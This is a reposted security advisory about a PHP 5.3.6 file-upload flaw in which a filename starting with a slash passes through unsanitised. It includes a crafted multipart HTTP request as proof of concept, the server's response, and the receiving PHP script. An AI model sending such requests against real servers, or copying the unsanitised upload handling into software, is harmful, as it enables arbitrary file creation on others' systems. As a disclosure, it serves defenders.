扫码分享
验证:
体验盒子source: https://www.securityfocus.com/bid/48259/info
PHP is prone to a security-bypass vulnerability.
Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.
PHP 5.3.6 is vulnerable; other versions may also be affected.
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200
------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain
any
------------ThIs_Is_tHe_bouNdaRY_$--
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {// process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}
体验盒子
